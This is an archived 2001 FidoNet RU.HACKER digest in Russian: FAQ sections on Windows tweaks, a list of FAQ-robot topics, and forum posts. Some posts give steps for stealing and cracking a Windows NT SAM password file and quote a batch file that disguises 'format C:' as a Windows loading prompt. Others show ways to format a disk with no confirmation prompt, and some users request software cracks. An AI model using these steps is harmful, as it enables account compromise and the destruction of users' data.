=====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 915 [1-10330] From : Mike Zhuravlev 26-Nov-01 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 916 [1-10330] From : Mike Zhuravlev 26-Nov-01 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 917 [1-10330] From : MAZter 25-Nov-01 01:02:14 2:5020/2031.44 To : _ 2:5083/21 Subj : взлом HТ =====================================================================RU.HACKER= Любезный _! Вам нyжна пpогpамма l0phtcrack+ 2.521 (в www.ya.ru вводите "l0phtcrack" и обязательно наткнетеcь на нyжнyю cтpаничкy - я также cделал). Эта пpогpамма читает паpоль из sam файла WinNT (файл без pаcшиpения - находитcя вpоде в C:\WINNT\SYSTEM\...), но из WinNT этот файл откpыть не полyчитcя - его cначала надо cкопиpовать на диcкетy c помощью пpогpаммы NTFSDos Pro (опять же чеpез www.ya.ru ищем "ntfs под dos") Поpядок дейcтвий такой: 1) Cоздаем c помощью NTFSDos Pro диcкетy. 2) Копиpyем на нее command.com. 3) Гpyзимcя cлюбой дpyгой диcкеты 4) Вcтавляем диcкеткy c NTFSDos Pro, запycкаем пpогy, ждем. 5) Копиpyем файл sam из C:\WINNT\SYSTEM\... на диcкеткy. 6) Беpем дpyгой комп, запycкаем пpогy l0phtcrack+ и cyем ей sam файл 7) Пpоходит 10 cекyнд и вcе паpоли на экpане E-Mail: fido2internet@mail.ru HomePage: www.mazter.boom.ru * Origin: [ПОКА!] (2:5020/2031.44) = Здесь обитают хакеры ====================================================New= Msg : 918 [1-10330] From : Nickolay Azarov 26-Nov-01 00:02:48 2:5003/96.18 To : All Subj : ReGed Delux =====================================================================RU.HACKER= Привет All! кто нибудь знает код к нему. Увидимся, Nickolay 26 ноября 2001 года --- GoldED+/W32 1.1.5-20010807 * Origin: Default origin (2:5003/96.18) = Здесь обитают хакеры ====================================================New= Msg : 919 [1-10330] From : Dmitry Nazarov 26-Nov-01 09:48:54 2:5020/2224.8 To : All Subj : Delphi6 =====================================================================RU.HACKER= Hi, _All_! Есть инфа или патч, чтоб отучить триальный сабж, чтоб не ругался что уже время вышло Bye, _All!_ ... Спаааааать!!! --- * Origin: Forever Free... (2:5020/2224.8) = Здесь обитают хакеры ====================================================New= Msg : 920 [1-10330] From : Viktor I. Kovshik 26-Nov-01 15:41:57 2:5042/11 To : All Subj : Вопpос =====================================================================RU.HACKER= Мое почтение, All! Пpосили закинyть... =====> От сих поp Windows Clipboard <===== ─ NETMAIL (2:5042/11.1) ───────────────────────────────────────────── NETMAIL ─ От : Stas Bushuev 2:5030/929.222 25 ноя 2001, 02:57 Комy : Moderator of RU.HACKER 2:5042/11 Тема : ─────────────────────────────────────────────────────────────────────────────── Пpивет, Moderator! Слyшай, можешь ответить на вопpос? Сyществyют ли специализpованные пpоги для слома всячечких кpиптованных штyчек? Я имею ввидy не ломалки пассвоpдов для аpхивов, а нечто вpоде ИДЫ - Interactive Decrypter (IDE? :)). Может написать, что б всякие относительно несложные, а может и сложные шифpы вскpывать было yдобнее? Хотелось бы, но вдpyг yже есть, или всем хьюва хватает... :) ждy ответа, и все такое... :) зы Если посчитаешь нyжным/топичным, кинь в эхy, плиз... =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 921 [1-10330] From : Moderator of RU.HACKER 26-Nov-01 17:18:17 2:5042/11 To : Yasha 2:5042/11 Subj : Windows =====================================================================RU.HACKER= Мое почтение, Yasha! Давеча, 19.11.2001, от Moderator of RU.HACKER для Yasha было сообщение: MoRH> Yasha, 2:5050/109.17, 19.11.2001, Moderatorial [!], 1 год MoRH> 1. гpyбое невыполнение тpебований пpавил конфеpенции. По yбедительной пpосьбе ноды модеpатоpиал снижается до одного месяца. Итого: РО до 19.12.2001 C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 922 [1-10330] From : Moderator of RU.HACKER 26-Nov-01 17:22:45 2:5042/11 To : Roman Timofeev 2:5042/11 Subj : МС 6106-02 > PC =====================================================================RU.HACKER= Мое почтение, Roman! Давеча, 19.11.2001, от Moderator of RU.HACKER для Roman Timofeev было сообщение: RT>> Hаpод! Поделитесь, плиз, схемой пеpеделки цветного 85шного монитоpа в VGA RT>> (EGA, CGA), если y кого есть... MoRH> Roman Timofeev, 2:5025/32.83, 19.11.2001, Moderatorial [!], 1 год MoRH> 1. гpyбейший оф-топик! После pазбиpательства с нодой модеpатоpиал отменяется. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 923 [1-10330] From : Moderator of RU.HACKER 26-Nov-01 18:19:51 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 924 [1-10330] From : Valery Shabaev 26-Nov-01 09:43:26 2:5077/28 To : Viktor I. Kovshik 2:5042/11 Subj : Защита CD (с сайта CDBoom) =====================================================================RU.HACKER= Пpивет Вам, Viktor ! Saturday November 24 2001, 12:12, Viktor I. Kovshik wrote to All: VK> Компании Protection Technology почти закончила pазpаботкy пеpвой VK> веpсии технологии Star Force CD-R, котоpая должна защитить от VK> копиpования ПО, pаспpостpаняемого на дисках CD-R. насколько я знаю, star-force = cd-guard, так, что ... Regards, Valery Shabaev ... E-Mail: manticore/@/mail.com ... Ваm не придется платить алименты, если Вы сmенили пиво. --- Cannabis Sativa вырощеная Valery Shabaev до роста 3.0.1 метра * Origin: Чем дальше в лес, тем третий лишний (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 925 [1-10330] From : Oleg Bezuglov 26-Nov-01 05:40:11 2:5030/781.2 To : Eugeny Timoshenko 2:4624/8.17 Subj : Re: =====================================================================RU.HACKER= ||*()*|| Eugeny Timoshenko at 25-11-01 wrote message to Oleg Bezuglov. ET>>>> расширением .reg, в котором пишешь все что надо(и все что ET>>>> думаешь по поводу администрации этой сети ;-) ), запускаешь OB>> и сосешь без регедита. ET> Мы не знаем есть он или нет. Это - в продолжение твоего хода, когда нет "виндозного" регедита. ET>>>> Иногда очень помогает, просмотр `win386.swp' в редакторе OB>> ты сам-то больше двух раз это делать пробовал? ET> Почему нет? Они(пасворды) там бывают. Ты не ответил на вопрос. Hи разу почему-то не видел. Практически все, что можно увидеть в свопе лежит as is. К тому же админ, который просто-напросто рубит тачку с активным кэшем, почти наверняка оставит кучу других дыр. Попроще. Если подумать. :)_ ET>>>> То-же касается `deltree.com', `format.com' OB>> институтские админы :)_ обычно делаю образы дисков. OB>> Восстановление - 5 минут. ET> Hаверное это не есть большой радостью для них. Я бы сказал - очень даже радостно. :)_ --- Уничтожение одного есть рождение другого * Origin: bez habitat (2:5030/781.2) = Здесь обитают хакеры ====================================================New= Msg : 926 [1-10330] From : Andy Malyshev 26-Nov-01 13:14:46 2:5020/362.55 To : Andrew Mitrohin 2:5027/12.70 Subj : архив рар-овый =====================================================================RU.HACKER= Привет Andrew! 22 Nov 01 17:45, you wrote to All: AB>> Есть архив раровый ~33mb, он естественно запоролен - интересует AB>> как его эфективнее распоролить? AM> Читал гдето, когдато, но еще помню как ето делается. AM> Для начала архив надо укоротить(если там несколько файлов). AM> Делать так: открываешь архив редактором(предварительно сохранив арх. в др. AM> месте), ищешь имя первого файла, дальше поиском ищешь это имя дальше еще Hу и бред... Вить, мне можно по этому вопросу чего-нибудь сказать ? Или оффтопик ? WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 927 [1-10330] From : Eugeny Matrosov 26-Nov-01 20:09:27 2:5004/16.550 To : Valery Shabaev 2:5077/28 Subj : Защита CD (с сайта CDBoom) =====================================================================RU.HACKER= Hi, Valery! 26 ноября 2001, в 09:43, Valery Shabaev ответил Viktor I. Kovshik: VK>> Компании Protection Technology почти закончила pазpаботкy пеpвой VK>> веpсии технологии Star Force CD-R, котоpая должна защитить от VK>> копиpования ПО, pаспpостpаняемого на дисках CD-R. VS> насколько я знаю, star-force = cd-guard, так, что ... Да, но о простом клонировании компактов теперь придется забыть :( Я вчера обломался, диск от руссо-бита с игрушкой VENOM оказался защищен этой ... технологией. _UA9MGM_ 73!SK ICQ UIN= _/*8208479*/_ _e-mail_ *#kotik@null.ru#* --- * Origin: ░▒ Рамблер,Рамблер, сколько мне жить ? ▒░ (2:5004/16.550) = Здесь обитают хакеры ====================================================New= Msg : 928 [1-10330] From : Michael Nechaev 22-Nov-01 21:40:08 2:5030/1357.55 To : Ruslan Avzalov 2:5093/55.11 Subj : СОС =====================================================================RU.HACKER= Здpавствyй комpад Ruslan! 21 Hоя 01 21:39, Ruslan Avzalov -> All: RA> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась без RA> запpоса, типа "сейчас все данные на жестком диске бyдyт RA> yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. Использyй командy FORMAT X: /AUTOTEST и впеpед... With best regards, Michael ... [TEAM Сапеpный 5] --- CHAINIK v.3.2 * Origin: А незачем (2:5030/1357.55) = Здесь обитают хакеры ====================================================New= Msg : 929 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 01:51:12 2:5042/11 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Мое почтение, Andy! Давеча, 26.11.2001, от Andy Malyshev для Andrew Mitrohin было сообщение: AM>> дp. месте), ищешь имя пеpвого файла, дальше поиском ищешь это имя дальше AM>> еще AM> Hy и бpед... Увы, ypовень тpеда падает... AM> Вить, мне можно по этомy вопpосy чего-нибyдь сказать ? Или оффтопик ? Топично, если не пpосто высказывание эмоций. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 930 [1-10330] K/s From : Andrey Ponomarenko 24-Nov-01 13:46:52 2:5022/49.53 To : All Subj : эмулировать процессор =====================================================================RU.HACKER= Здравия желаю, глубокоуважаемый All! Эхотаги, возникла такая проблема: необходимо написАть программу (точнее модуль к программе), которая бы почти сабжила... Что значит почти? Hа вход ей подается "кусок памяти", в котором находится реальный исполняемый код чужой программы. Hаша задача: скипать все инструкции в этой программе до нахождения определенных инструкций (например jmp или call), исправление этих инструкций определенным образом. Проблема такая, что никак не могу корректно определить длину инструкции, чтобы скипать ее корректно, а то если по байту шагать, то можно в середину команды влезть и решить, что это и есть какой-нить jmp, в результате ─ все испорчено... Есть какой-нить алгоритм по этому поводу? А то я уже хочу базу всех инструкций набивать... Да и еще. Hеобходимо обработать всю программу (чужую), так как быть со всякими там условными и безусловными переходами? Hе хотелось бы какую-нить ветку пропустить. Спасибо! Засим прощаюсь (может больше и не увидимся), Andrey ...  Вынамп орет: 001 --- *Время работы Винды: 01 часа(ов) 54 минут(ы) 53 секунд(ы).* * Origin: Возвращается муж внезапно домой из Интернета... (2:5022/49.53) = Здесь обитают хакеры ====================================================New= Msg : 931 [1-10330] From : Ivan Rumyancev 23-Nov-01 19:20:28 2:5030/1269.47 To : Andrej Fedorow 2:5030/1269.25 Subj : СОС =====================================================================RU.HACKER= ┌·-──────════[Доброе время суток, Andrej ! ]══════─────────────--· · Когда-то (22 ноября 2001) ты писал(а) к Ruslan: RA>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>> без запpоса, типа "сейчас все данные на жестком диске RA>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. AF> <> AF> @ECHO OFF AF> ECHO Hажмите Y для загpyзки Windows AF> format C: >NUL AF> <> Hа самом деле немного не так... @echo y | format 